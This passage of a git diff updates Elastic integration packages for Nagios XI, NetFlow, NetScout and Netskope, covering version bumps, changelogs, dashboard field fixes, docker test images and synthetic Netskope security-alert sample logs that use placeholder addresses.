@@ format_version: 1.0.0 name: nagios_xi title: "Nagios XI" -version: "1.2.0" +version: "1.2.1" license: basic description: Collect Logs and Metrics from Nagios XI with Elastic Agent. type: integration diff --git a/packages/netflow/changelog.yml b/packages/netflow/changelog.yml index 1732fdfd1a2..0dd1b103954 100644 --- a/packages/netflow/changelog.yml +++ b/packages/netflow/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "2.18.0" + changes: + - description: Update package spec to 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9235 +- version: "2.17.2" + changes: + - description: Fix duplicated names in dashboard. + type: bugfix + link: https://github.com/elastic/integrations/pull/9173 - version: "2.17.1" changes: - description: Changed owners diff --git a/packages/netflow/kibana/dashboard/netflow-38012abe-c611-4124-8497-381fcd85acc8.json b/packages/netflow/kibana/dashboard/netflow-38012abe-c611-4124-8497-381fcd85acc8.json index bcc41f40fc4..049b54287e6 100644 --- a/packages/netflow/kibana/dashboard/netflow-38012abe-c611-4124-8497-381fcd85acc8.json +++ b/packages/netflow/kibana/dashboard/netflow-38012abe-c611-4124-8497-381fcd85acc8.json @@ -2025,7 +2025,7 @@ }, { "id": "logs-*", - "name": "b0d83992-011c-4437-b57a-7afd050ad8bf", + "name": "d04d29f3-5b7b-49b9-b689-5af89eb5a2f7", "type": "index-pattern" } ], @@ -2044,7 +2044,7 @@ "9a13f784-1095-4dba-a081-720654c92d4b": { "dataType": "ip", "isBucketed": true, - "label": "Top 5 values of source.ip", + "label": "Top 5 values of destination.ip", "operationType": "terms", "params": { "exclude": [], @@ -2061,10 +2061,11 @@ "parentFormat": { "id": "terms" }, + "secondaryFields": [], "size": 5 }, "scale": "ordinal", - "sourceField": "source.ip" + "sourceField": "destination.ip" }, "ba7efcae-97de-41b4-90e9-87a0b6991363": { "dataType": "date", @@ -2115,7 +2116,7 @@ "alias": null, "disabled": false, "field": "data_stream.dataset", - "index": "b0d83992-011c-4437-b57a-7afd050ad8bf", + "index": "d04d29f3-5b7b-49b9-b689-5af89eb5a2f7", "key": "data_stream.dataset", "negate": false, "params": { @@ -2383,7 +2384,7 @@ }, { "id": "logs-*", - "name": "a7021d78-1671-440f-8d11-5257cc2729cc", + "name": "9064af87-c756-4aeb-abbd-eefa10cdb45a", "type": "index-pattern" } ], @@ -2402,7 +2403,7 @@ "9a13f784-1095-4dba-a081-720654c92d4b": { "dataType": "ip", "isBucketed": true, - "label": "Top 5 values of source.ip", + "label": "Top 5 values of destination.ip", "operationType": "terms", "params": { "exclude": [], @@ -2419,10 +2420,11 @@ "parentFormat": { "id": "terms" }, + "secondaryFields": [], "size": 5 }, "scale": "ordinal", - "sourceField": "source.ip" + "sourceField": "destination.ip" }, "ba7efcae-97de-41b4-90e9-87a0b6991363": { "dataType": "date", @@ -2467,7 +2469,7 @@ "alias": null, "disabled": false, "field": "data_stream.dataset", - "index": "a7021d78-1671-440f-8d11-5257cc2729cc", + "index": "9064af87-c756-4aeb-abbd-eefa10cdb45a", "key": "data_stream.dataset", "negate": false, "params": { @@ -3107,7 +3109,7 @@ }, { "id": "logs-*", - "name": "0263d326-434a-42ce-af58-757f4bfef004", + "name": "4e849c9a-41d5-48e9-84ac-48bc039aed93", "type": "index-pattern" } ], @@ -3199,7 +3201,7 @@ "alias": null, "disabled": false, "field": "data_stream.dataset", - "index": "0263d326-434a-42ce-af58-757f4bfef004", + "index": "4e849c9a-41d5-48e9-84ac-48bc039aed93", "key": "data_stream.dataset", "negate": false, "params": { @@ -3295,7 +3297,7 @@ }, { "id": "logs-*", - "name": "35355396-26a5-49bc-97af-8d44e2e324e4", + "name": "80d24562-0746-4a7f-81af-b189b2e7f4d6", "type": "index-pattern" } ], @@ -3355,13 +3357,13 @@ "customLabel": true, "dataType": "number", "isBucketed": false, - "label": "Packets", + "label": "Bytes", "operationType": "sum", "params": { "emptyAsNull": true }, "scale": "ratio", - "sourceField": "network.packets" + "sourceField": "network.bytes" } }, "incompleteColumns": {} @@ -3381,7 +3383,7 @@ "alias": null, "disabled": false, "field": "data_stream.dataset", - "index": "35355396-26a5-49bc-97af-8d44e2e324e4", + "index": "80d24562-0746-4a7f-81af-b189b2e7f4d6", "key": "data_stream.dataset", "negate": false, "params": { @@ -3473,7 +3475,7 @@ }, { "id": "logs-*", - "name": "a8c52318-586e-4c82-bf05-6c1d94319c21", + "name": "8ac4f320-dae9-4d95-8f97-bb0c06ff17d7", "type": "index-pattern" } ], @@ -3559,7 +3561,7 @@ "alias": null, "disabled": false, "field": "data_stream.dataset", - "index": "a8c52318-586e-4c82-bf05-6c1d94319c21", + "index": "8ac4f320-dae9-4d95-8f97-bb0c06ff17d7", "key": "data_stream.dataset", "negate": false, "params": { @@ -3646,7 +3648,7 @@ "version": 1 }, "coreMigrationVersion": "8.7.1", - "created_at": "2023-07-19T09:29:25.515Z", + "created_at": "2024-02-15T15:12:45.659Z", "id": "netflow-38012abe-c611-4124-8497-381fcd85acc8", "migrationVersion": { "dashboard": "8.7.0" @@ -3804,7 +3806,7 @@ }, { "id": "logs-*", - "name": "4225eddd-d189-410e-ad6a-c445a7c4abef:b0d83992-011c-4437-b57a-7afd050ad8bf", + "name": "4225eddd-d189-410e-ad6a-c445a7c4abef:d04d29f3-5b7b-49b9-b689-5af89eb5a2f7", "type": "index-pattern" }, { @@ -3824,7 +3826,7 @@ }, { "id": "logs-*", - "name": "b7f176ff-368c-4cee-b2bf-1733bf0d670f:a7021d78-1671-440f-8d11-5257cc2729cc", + "name": "b7f176ff-368c-4cee-b2bf-1733bf0d670f:9064af87-c756-4aeb-abbd-eefa10cdb45a", "type": "index-pattern" }, { @@ -3864,7 +3866,7 @@ }, { "id": "logs-*", - "name": "0a3aaeea-585e-4486-8371-777c827480b4:0263d326-434a-42ce-af58-757f4bfef004", + "name": "0a3aaeea-585e-4486-8371-777c827480b4:4e849c9a-41d5-48e9-84ac-48bc039aed93", "type": "index-pattern" }, { @@ -3874,7 +3876,7 @@ }, { "id": "logs-*", - "name": "a22d6b0c-165f-43f4-adae-72e575f31b5c:35355396-26a5-49bc-97af-8d44e2e324e4", + "name": "a22d6b0c-165f-43f4-adae-72e575f31b5c:80d24562-0746-4a7f-81af-b189b2e7f4d6", "type": "index-pattern" }, { @@ -3884,7 +3886,7 @@ }, { "id": "logs-*", - "name": "4025844a-48f0-4e53-93b2-7245df236e0f:a8c52318-586e-4c82-bf05-6c1d94319c21", + "name": "4025844a-48f0-4e53-93b2-7245df236e0f:8ac4f320-dae9-4d95-8f97-bb0c06ff17d7", "type": "index-pattern" } ], diff --git a/packages/netflow/manifest.yml b/packages/netflow/manifest.yml index 6b3ba671429..e26f96efbdd 100644 --- a/packages/netflow/manifest.yml +++ b/packages/netflow/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: netflow title: NetFlow Records -version: "2.17.1" +version: "2.18.0" description: Collect flow records from NetFlow and IPFIX exporters with Elastic Agent. type: integration categories: diff --git a/packages/netscout/_dev/deploy/docker/docker-compose.yml b/packages/netscout/_dev/deploy/docker/docker-compose.yml index 0a4f54a4a23..09e3dfe189a 100644 --- a/packages/netscout/_dev/deploy/docker/docker-compose.yml +++ b/packages/netscout/_dev/deploy/docker/docker-compose.yml @@ -7,14 +7,12 @@ services: - ${SERVICE_LOGS_DIR}:/var/log command: /bin/sh -c "cp /sample_logs/* /var/log/" netscout-sightline-udp: - image: akroh/stream:v0.2.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9524 -p=udp /sample_logs/netscout-sightline-*.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9524 -p=udp /sample_logs/netscout-sightline-*.log netscout-sightline-tcp: - image: akroh/stream:v0.2.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9524 -p=tcp /sample_logs/netscout-sightline-*.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9524 -p=tcp /sample_logs/netscout-sightline-*.log diff --git a/packages/netscout/changelog.yml b/packages/netscout/changelog.yml index 24cd4dddcf3..1161d3949db 100644 --- a/packages/netscout/changelog.yml +++ b/packages/netscout/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.20.0" + changes: + - description: Deprecate package. + type: enhancement + link: https://github.com/elastic/integrations/pull/9074 - version: "0.19.1" changes: - description: Fix exclude_files pattern. diff --git a/packages/netscout/manifest.yml b/packages/netscout/manifest.yml index 8295119fefc..77fee095b6a 100644 --- a/packages/netscout/manifest.yml +++ b/packages/netscout/manifest.yml @@ -1,12 +1,12 @@ format_version: 2.7.0 name: netscout -title: Arbor Peakflow SP Logs -version: "0.19.1" -description: Collect and parse logs from Netscout Arbor Peakflow SP with Elastic Agent. +title: Arbor Peakflow SP Logs (Deprecated) +version: "0.20.0" +description: Deprecated. Netscout Arbor Peakflow SP is no longer supported. categories: ["security", "network"] type: integration conditions: - kibana.version: "^7.14.1 || ^8.0.0" + kibana.version: "^8.8.0" policy_templates: - name: sightline title: Arbor Peakflow SP diff --git a/packages/netskope/_dev/deploy/docker/docker-compose.yml b/packages/netskope/_dev/deploy/docker/docker-compose.yml index 9b3cb7fe09f..bf868247965 100644 --- a/packages/netskope/_dev/deploy/docker/docker-compose.yml +++ b/packages/netskope/_dev/deploy/docker/docker-compose.yml @@ -1,14 +1,12 @@ version: "2.3" services: netskope-alerts-tcp: - image: docker.elastic.co/observability/stream:v0.8.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9020 -p=tcp /sample_logs/alerts.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9020 -p=tcp /sample_logs/alerts.log netskope-events-tcp: - image: docker.elastic.co/observability/stream:v0.8.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9021 -p=tcp /sample_logs/events.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9021 -p=tcp /sample_logs/events.log diff --git a/packages/netskope/_dev/deploy/docker/sample_logs/alerts.log b/packages/netskope/_dev/deploy/docker/sample_logs/alerts.log index 97b7363cdfb..474ca74c0ed 100644 --- a/packages/netskope/_dev/deploy/docker/sample_logs/alerts.log +++ b/packages/netskope/_dev/deploy/docker/sample_logs/alerts.log @@ -5,4 +5,4 @@ {"event":{"id":"045b4a05e63667d3b25279e1"},"netskope":{"alerts":{"insertion_epoch_timestamp":1643398205,"access_method":"Client","acked":"false","is_alert":"yes","alert":{"name":"example.com/images/favicon.ico","type":"malsite"},"type":"malsite","app":{"session":{"id":"5227418687549615144"},"category":"Prohibited Sites"},"browser":{"session":{"id":"3264708578582859888"}},"category":{"name":"Prohibited Sites"},"cci":"0","ccl":"unknown","connection":{"id":"0"},"count":1,"device":{"name":"Windows Device","classification":"unmanaged"},"is_malicious":"yes","malsite":{"category":"['Malicious Site']","country":"IN","id":"c4634b403efff5e7ae84eb59","ip_host":"45.114.142.143","latitude":17.3752803802,"longitude":78.4744415283,"region":"Telangana","severity":{"level":"med"}},"managed":{"app":"no"},"netskope_pop":"US-SFO1","organization":{"unit":"null"},"other":{"categories":"['Prohibited Sites', 'All Categories', 'Security Risk - Compromised/malicious sites', 'Security Risk - Malware Distribution Point', 'Security Risk']"},"page":{"url":"example.com/images/favicon.ico","site":"example"},"severity":{"level":"unknown","level_id":1},"site":"example","source":{"time":"Fri Jan 28 11:24:00 2022"},"telemetry":{"app":"example"},"threat":{"match":{"field":"url","value":"example.com/images/favicon.ico"},"source":{"id":"1"}},"traffic":{"type":"Web"},"transaction":{"id":"4272771780484953037"},"url":"example.com/images/favicon.ico","user":{"group":"null","ip":"81.2.69.143"},"action":"block","ip":{"protocol":"TCP"},"notify":{"template":"1.html"},"policy":{"name":"[Access Control] Prohibited Sites"},"referer":"https://examplesecuritycheck.com/"}},"user_agent":{"name":"Chrome","os":{"name":"Windows 10","version":"Windows 10"}},"destination":{"geo":{"country_iso_code":"IN","location":{"lat":17.3752803802,"lon":78.4744415283},"city_name":"Hyderabad","region_name":"Telangana","timezone":"Asia/Kolkata","postal_code":"N/A"},"ip":"81.2.69.143","address":"81.2.69.143"},"host":{"hostname":"Surface"},"network":{"protocol":"HTTPS/1.1"},"source":{"geo":{"country_iso_code":"US","location":{"lat":32.7994,"lon":-117.1686},"city_name":"San Diego","region_name":"California","timezone":"America/Los_Angeles","postal_code":"92111"},"ip":"81.2.69.143","address":"81.2.69.143"},"@timestamp":"2022-01-28T19:25:02.000Z","user":{"email":{"1":"user@example.com","2":"user@example.com","3":"user@example.com"}}} {"event":{"id":"9c4f8947f6326ff0ad79f4a3"},"netskope":{"alerts":{"insertion_epoch_timestamp":1643398226,"access_method":"Client","acked":"false","action":"Detection","activity":{"name":"Download"},"is_alert":"yes","alert":{"name":"Document-PDF.Exploit.CVE-2018-49","type":"nspolicy"},"type":"Malware","app":{"name":"examplesecuritycheck","app_name":"examplesecuritycheck","session":{"id":"5227418687549615144"},"category":"Security"},"category":{"name":"Security"},"ccl":"unknown","connection":{"id":"0"},"count":1,"detection":{"engine":"example Threat Intelligence"},"file":{"id":"9fd78f86b33b566883ede8de9bc92a59"},"instance":{"name":"null"},"malware":{"id":"78e527c7a66ea6bf74d2ca7e335a5685","name":"Document-PDF.Exploit.CVE-2018-49","profile":"5","severity":"high","type":"Trojan"},"ml_detection":"false","object":{"name":"9","type":"File"},"organization":{"unit":"null"},"other":{"categories":"['All Categories', 'Security']"},"scanner_result":"malicious","severity":{"level":"High","id":"3"},"site":"examplesecuritycheck","title":"9","traffic":{"type":"Web"},"tss":{"mode":"inline"},"user":{"group":"null"},"browser":{"session":{"id":"3264708578582859888"}},"device":{"name":"Windows Device","classification":"unmanaged"},"destination":{"geoip_src":1},"flow_status":"closed","ip":{"protocol":"TCP"},"ns_device_uid":"F546DEC0-AFF8-F1D5-1759-6721396ED3F8","page":{"url":"examplesecuritycheck.com/tests/execute/9","site":"examplesecuritycheck"},"referer":"https://examplesecuritycheck.com/","source":{"geoip_src":2,"time":"Fri Jan 28 11:25:00 2022"},"transaction":{"id":"8479039290096064292"},"is_web_universal_connector":"yes"}},"file":{"name":"9","size":1521,"mime_type":{"1":"application\\\\/vnd.apps.document"}},"threat":{"indicator":{"file":{"hash":{"md5":"e525a5e5570041dcae34fc342d3712da","sha256":"7d9a763411c73a4c7f85eb1f3cf04d6693696588b3fb3c98e8982bbe4245920c"}}}},"@timestamp":"2022-01-28T19:25:20.000Z","user":{"email":{"1":"user@example.com","2":"user@example.com","3":"user@example.com","4":"user@example.com"}},"user_agent":{"name":"Chrome","version":"97.0.4692.99","os":{"name":"Windows 10","version":"Windows 10"}},"destination":{"geo":{"country_iso_code":"US","location":{"lat":37.405991,"lon":-122.078514},"city_name":"Mountain View","region_name":"California","timezone":"America/Los_Angeles","postal_code":"N/A"},"ip":"81.2.69.143","address":"81.2.69.143"},"host":{"hostname":"Jenga-Surface"},"source":{"geo":{"location":{"lat":32.7994,"lon":-117.1686},"city_name":"San Diego","region_name":"California","timezone":"America/Los_Angeles","postal_code":"92111","country_iso_code":"US"},"ip":"81.2.69.143","address":"81.2.69.143"}} {"event":{"id":"b999bebb17c193b3350f16b3"},"netskope":{"alerts":{"insertion_epoch_timestamp":1643512589,"access_method":"Reverse Proxy","acked":"false","action":"anomaly_detection","activity":{"name":"Delete"},"is_alert":"yes","alert":{"id":"e6326f36925eb2959f0938315dbd3503","name":"Bulk Delete","type":"nspolicy"},"app":{"name":"SomeApp","category":"Cloud Storage"},"category":{"name":"Cloud Storage"},"cci":"52","ccl":"low","count":1,"device":{"name":"Mac Device","classification":"managed"},"destination":{"geoip_src":2},"event":{"type":"sequence"},"event_source_channel":"application","from":{"storage":"kandji-prd-managed-library-items"},"managed":{"app":"no"},"management":{"id":"918C405E48DD5115862A39150E5C7E06"},"ns_device_uid":"740E2C56-31F5-190E-F76F-CEC7D82710FE","object":{"name":"TNVaXVdogPIwDHZL","type":"Folder"},"organization":{"unit":"example.local/example/Active Users"},"orig_ty":"nspolicy","other":{"categories":"null"},"page":{"url":"kandji-prd-managed-library-items.example.com","site":"Some App"},"policy":{"name":"Bulk Delete","actions":"['Delete']"},"profile":{"id":"Bulk Delete"},"severity":{"level":"medium"},"site":"F-Secure VPN+","source":{"geoip_src":1},"telemetry":{"app":"none"},"threshold":{"value":100,"time":3600},"traffic":{"type":"CloudApp"},"transaction":{"id":"2401226170271289300"},"type":"uba","url":"zCyaZZIAMFPHEibU","user":{"ip":"81.2.69.143"}}},"user_agent":{"name":"Native","os":{"name":"Mojave","version":"Mojave"}},"destination":{"geo":{"country_iso_code":"US","location":{"lat":45.8234,"lon":-119.7257},"city_name":"Boardman","region_name":"Oregon","postal_code":"97818"},"address":"81.2.69.143","ip":"81.2.69.143"},"file":{"size":133067189,"mime_type":{"1":"application\\\\/vnd.apps.document"}},"host":{"hostname":"C02ZL3MPLVDR"},"source":{"geo":{"country_iso_code":"FR","location":{"lat":48.883411,"lon":2.23894},"city_name":"Puteaux","region_name":"Ile-de-France"},"address":"81.2.69.143","ip":"81.2.69.143"},"@timestamp":"2022-01-30T00:58:52.000Z","user":{"email":{"1":"userdte471@test.example.com","2":"USERDTE471@test.example.com","3":"USERDTE471@test.example.com"},"group":{"name":"null"}}} -{"event":{"id":"47eccb9569fe50460ad1200f"},"netskope":{"alerts":{"insertion_epoch_timestamp":1642755526,"acked":"false","is_alert":"yes","alert":{"name":"cit0day - download1.mios.com","type":"breach"},"type":"Compromised Credential","breach":{"date":1601942400,"description":"In September 2020, a threat actor began sharing the millions of stolen credentials that were associated with a prominent Dark Web credentials service shut down by US federal authorites in August 2020. The stolen credentials represent hundreds of websites and hundreds of millions of users and their associated passwords affected by the illegal antics of the threat actor who managed the now defunct Dark Web forum. Users and companies from all over the world were affected by these various breaches. This file contains the download1.mios.com accounts dump.","id":"bc6952df4c61b469cf4a47f17d0ea384","media_references":"null","score":40,"target_references":"null"},"category":{"name":"null"},"cci":"0","ccl":"unknown","count":1,"email":{"source":"Active"},"external":{"email":1},"matched":{"username":"user@example.com"},"organization":{"unit":"null"},"other":{"categories":"null"},"user":{"group":"null"},"app":{"category":"null"}}},"@timestamp":"2022-01-19T21:39:15.000Z","user":{"email":{"1":"user@example.com","2":"user@example.com","3":"user@example.com"}}} \ No newline at end of file +{"event":{"id":"47eccb9569fe50460ad1200f"},"netskope":{"alerts":{"insertion_epoch_timestamp":1642755526,"acked":"false","is_alert":"yes","alert":{"name":"cit0day - download1.mios.com","type":"breach"},"type":"Compromised Credential","breach":{"date":1601942400,"description":"In September 2020, a threat actor began sharing the millions of stolen credentials that were associated with a prominent Dark Web credentials service shut down by US federal authorites in August 2020. The stolen credentials represent hundreds of websites and hundreds of millions of users and their associated passwords affected by the illegal antics of the threat actor who managed the now defunct Dark Web forum. Users and companies from all over the world were affected by these various breaches. This file contains the download1.mios.com accounts dump.","id":"bc6952df4c61b469cf4a47f17d0ea384","media_references":"null","score":40,"target_references":"null"},"category":{"name":"null"},"cci":"0","ccl":"unknown","count":1,"email":{"source":"Active"},"external":{"email":1},"matched":{"username":"user@example.com"},"organization":{"unit":"null"},"other":{"categories":"null"},"user":{"group":"null"},"app":{"category":"null"}}},"@timestamp":"2022-01-19T21:39:15.000Z","user":{"email":{"1":"user@example.com","2":"user@example.com","3":"user@example.com"}}} diff --git a/packages/netskope/_dev/deploy/docker/sample_logs/events.log b/packages/netskope/_dev/deploy/docker/sample_logs/events.log index c77e2a79d64..bb19abe4906 100644 --- a/packages/netskope/_dev/deploy/docker/sample_logs/events.log +++ b/packages/netskope/_dev/deploy/docker/sample_logs/events.log @@ -2,4 +2,4 @@ {"netskope":{"events":{"event_type":"network","destination":{"geoip":{"source":1}},"insertion":{"timestamp":1643512690},"access_method":"Client","app":{"name":"[app-name]","category":"null"},"category":{"name":"null"},"ccl":"unknown","count":1,"device":{"type":"Windows Device"},"ip":{"protocol":"TCP"},"numbytes":92653,"organization_unit":"null","policy":{"name":"hEfQoOPfTWYzbYfC"},"session":{"packets":71},"site":"[app-test]","total_packets":128,"traffic":{"type":"PrivateApp"},"tunnel":{"id":"1840937979","type":"NPA","up_time":71},"type":"network","source":{"geoip_src":2},"user":{"ip":"89.160.20.112"}}},"event":{"action":"allow","id":"8d61df5a9a8a2709c21e6dfb"},"destination":{"geo":{"country_iso_code":"FR","location":{"lat":48.883411,"lon":2.23894},"city_name":"Puteaux","region_name":"Ile-de-France"},"address":"81.2.69.143","ip":"81.2.69.143","port":80},"client":{"bytes":88028,"packets":70},"user_agent":{"os":{"name":"Windows","version":"10.0 (1809)"}},"network":{"protocol":"Http"},"server":{"bytes":4625,"packets":58},"source":{"address":"81.2.69.143","ip":"81.2.69.143","port":16,"geo":{"country_iso_code":"NL","location":{"lat":52.3759,"lon":4.8975},"city_name":"Amsterdam","region_name":"North Holland","postal_code":"1012"}},"@timestamp":"2022-01-30T00:58:52.000Z","user":{"email":{"1":"userdte471@example.com","2":"USERDTE471@example.com","3":"USERDTE471@example.com"},"group":{"name":"null"}}} {"netskope":{"events":{"event_type":"audit","insertion":{"timestamp":1643521800},"audit":{"log":{"event":"Login Successful"}},"ccl":"unknown","count":1,"organization_unit":"null","severity":{"level":"2"},"supporting_data":"{'data_type': 'user', 'data_values': ['71.198.199.251', 'user@example.com']}","type":"admin_audit_logs"}},"event":{"id":"c198aee5561d930a120e4fb4"},"@timestamp":"2022-01-30T05:44:59.000Z","user":{"email":{"1":"user@example.com","2":"user@example.com"}}} {"netskope":{"events":{"event_type":"page","insertion":{"timestamp":1643512735},"access_method":"Secure Forwarder","app":{"name":"SomeApp","category":"Cloud Storage"},"category":{"name":"Cloud Storage"},"cci":"72","ccl":"medium","connection":{"duration":41,"end_time":1601970462,"start_time":1601970421},"count":1,"device":{"type":"Windows Device"},"domain":"YFzrXohPeIcanEwg","destination":{"geoip":{"source":1}},"numbytes":217350,"organization_unit":"null","page":"www.example.com","request":{"count":14},"response":{"count":14,"content":{"length":174053,"type":"text/html"}},"severity":{"level":"unknown"},"site":"SomeSite","source":{"geoip_src":2},"traffic":{"type":"CloudApp"},"user":{"generated":"True","ip":"89.160.20.112"},"url":"ABwagJUWXsoBHcFJ","is_bypass_traffic":"no","http_transaction_count":12,"suppression":{"end_time":1601970439,"start_time":1601970424},"transaction":{"id":"0"}}},"event":{"id":"fd54bdb5916df42dc55712a4"},"user_agent":{"name":"Firefox","version":"85.0.4183.121","os":{"name":"Windows 10","version":"Windows 10"},"original":"Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:95.0) Gecko/20100101 Firefox/95.0"},"client":{"bytes":26538},"destination":{"geo":{"country_iso_code":"FR","location":{"lat":48.883411,"lon":2.23894},"city_name":"Puteaux","region_name":"Ile-de-France","timezone":"Asia/Kolkata"},"address":"81.2.69.143","ip":"81.2.69.143","port":443},"server":{"bytes":190812},"source":{"geo":{"country_iso_code":"IN","location":{"lat":12.9634,"lon":77.5855},"city_name":"Bengaluru","region_name":"Karnataka","timezone":"Asia/Kolkata","postal_code":"560002"},"address":"81.2.69.143","ip":"81.2.69.143"},"@timestamp":"2022-01-30T00:58:52.000Z","user":{"email":{"1":"userdte471@example.com","2":"USERDTE471@example.com","3":"foo@bar.com"},"group":{"name":"null"}},"host":{"hostname":"DESKTOP-WORKGROUP"}} -{"@timestamp":"2021-12-24T00:29:56.000Z","event.id":"613ee55ec9d868fc47654a73","netskope":{"events":{"event_type":"infrastructure","severity":{"level":"high"},"alarm":{"name":"No_events_from_device","description":"Events from device not received in the last 24 hours"},"device":{"name":"device-1"},"metric_value":43831789,"serial":"FFFFFFFFFFFFFFFF","supporting_data":"abc"}}} \ No newline at end of file +{"@timestamp":"2021-12-24T00:29:56.000Z","event.id":"613ee55ec9d868fc47654a73","netskope":{"events":{"event_type":"infrastructure","severity":{"level":"high"},"alarm":{"name":"No_events_from_device","description":"Events from device not received in the last 24 hours"},"device":{"name":"device-1"},"metric_value":43831789,"serial":"FFFFFFFFFFFFFFFF","supporting_data":"abc"}}} diff --git a/packages/netskope/changelog.yml b/packages/netskope/changelog.yml index 397bf05c394..47a75faeb2c 100644 --- a/packages/netskope/changelog.yml +++ b/packages/netskope/changelog.yml @@ -1,4 +1,24 @@ # newer versions go on top +- version: "1.18.0" + changes: + - description: Added support for custom TCP options. + type: enhancement + link: https://github.com/elastic/integrations/pull/9605 +- version: "1.17.2" + changes: + - description: Add on_failure in json processor and handle the string type value for user.email field + type: bugfix + link: https://github.com/elastic/integrations/pull/9472 +- version: "1.17.1" + changes: + - description: Fix the date processor to support UNIX format + type: bugfix + link: https://github.com/elastic/integrations/pull/9431 +- version: "1.17.0" + changes: + - description: Update manifest format version to v3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9403 - version: "1.16.1" changes: - description: Changed owners diff --git a/packages/netskope/data_stream/alerts/_dev/test/pipeline/test-alerts.log b/packages/netskope/data_stream/alerts/_dev/test/pipeline/test-alerts.log index 90d04039fcf..39e6ea16383 100644 --- a/packages/netskope/data_stream/alerts/_dev/test/pipeline/test-alerts.log +++ b/packages/netskope/data_stream/alerts/_dev/test/pipeline/test-alerts.log @@ -25,3 +25,4 @@ {"event":{"id":"abc123a1a53aad"},"netskope":{"alerts":{"insertion_epoch_timestamp":1656621348,"acked":"true","is_alert":"no","alert":{"name":"test-alert","type":"breach"},"type":"Compromised Credential","breach":{"date":1505484800,"description":"Test alert description","id":"abcdefghd857e3cfbdb6d5704b48484","media_references":"null","score":40,"target_references":"test"},"category":{"name":"Credential"},"cci":"0","ccl":"unknown","count":1,"email":{"source":"Client"},"external":{"email":1},"matched":{"username":"user@example.com"},"organization":{"unit":"null"},"other":{"categories":"null"},"app":{"category":"app"}}},"@timestamp":"2022-05-15T15:34:26.000Z","user":{"email":{"1":"user@example.com","2":"user@example.com","3":"user@example.com"}}} {"event":{"id":"123abb3426a0ffa82a"},"netskope":{"alerts":{"insertion_epoch_timestamp":1556584553,"access_method":"Client","acked":"false","action":"block","activity":{"name":"Browse"},"is_alert":"yes","alert":{"name":"alert","type":"Test"},"app":{"name":"test-app","category":"test","session":{"id":"123488558609175"}},"category":{"name":"null"},"cci":"0","ccl":"unknown","count":1,"device":{"name":"Mac Device"},"organization":{"unit":"null"},"other":{"categories":"null"},"policy":{"name":"Test block policy"},"request":{"id":"21323452216123"},"site":"[test-site]","traffic":{"type":"CloudApp"},"type":"policy","url":"www.example.com\/","connection":{"id":"1234108856823906"},"managed":{"app":"yes"},"netskope_pop":"test-pop","severity":{"level":"unknown"}}},"user_agent":{"name":"Chrome","os":{"name":"Chrome","version":"91.0"}},"destination":{"geo":{"country_iso_code":"AT","location":{"lat":-90,"lon":-180},"city_name":"Vienna","region_name":"Vienna","postal_code":"1040","timezone":"Europe\/Vienna"},"address":"81.2.69.144","ip":"81.2.69.144"},"source":{"geo":{"country_iso_code":"RO","location":{"lat":90,"lon":180},"city_name":"Cluj-Napoca","region_name":"Cluj","postal_code":"400420","timezone":"Europe\/Bucharest"},"address":"81.2.69.144","ip":"81.2.69.144"},"@timestamp":"2022-05-16T10:22:26.000Z","user":{"email":{"1":"user@example.com","2":"user@example.com","3":"user@example.com"}},"network":{"protocol":"HTTPS"}} {"event":{"id":"abcd19518cee24e"},"netskope":{"alerts":{"insertion_epoch_timestamp":1659940011,"access_method":"Client","acked":"false","action":"block","activity":{"name":"Upload","status":"Access Denied"},"is_alert":"yes","alert":{"id":"5312ab7ce55506bf055047551a5ecc55","name":"test_alert","type":"nspolicy"},"app":{"name":"test-app","category":"Collaboration","session":{"id":"1320712336"}},"category":{"name":"Collaboration"},"cci":"89","ccl":"excellent","count":1,"device":{"name":"Windows Device","classification":"unmanaged"},"destination":{"geoip_src":1},"event":{"type":"sequence"},"event_source_channel":"application","managed":{"app":"yes"},"object":{"name":"TestResult.jpg","type":"File"},"organization":{"unit":"null"},"orig_ty":"nspolicy","other":{"categories":"['Cloud Storage']"},"page":{"url":"","site":"example..com"},"policy":{"name":"test-policy","actions":"['Upload']"},"profile":{"id":"test-profile"},"severity":{"level":"high"},"site":"example.com","source":{"geoip_src":2},"telemetry":{"app":"null"},"threshold":{"value":343},"traffic":{"type":"CloudApp"},"transaction":{"id":"78945610225424"},"type":"uba","url":"example.com\/abc\/test.txt","user":{"ip":"81.2.69.144"},"browser":{"session":{"id":"1232810986401"}},"last":{"app":"test-app","country":"US","device":"Device","location":"Columbus","region":"Ohio","timestamp":1650005},"slc_longitude":"80.2784729004","uba_ap1":"test_uba_ap12","uba_ap2":"test_uba_ap2","uba_inst1":"test_uba_inst1","uba_inst2":"test_uba_inst2","connection":{"id":"1234566742606078"},"instance":{"id":"5623027123"},"parent":{"id":"\/exammple\/test"},"referer":"https:\/\/ 